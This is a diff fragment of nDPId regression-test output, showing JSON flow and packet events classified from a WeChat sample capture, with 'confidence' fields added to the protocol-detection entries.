-00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167641988,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00623{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00578{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00576{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"}
@@ -550,7 +550,7 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1492171169377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1492171169377,"pkt":"8IQvSpdgeJKcD6iOCABFEABMYzZAAEAR4JXAqAFnwcxy6ZLKAHsAOA7KIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANybOCEWgBhs"}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"}
@@ -568,7 +568,7 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"}
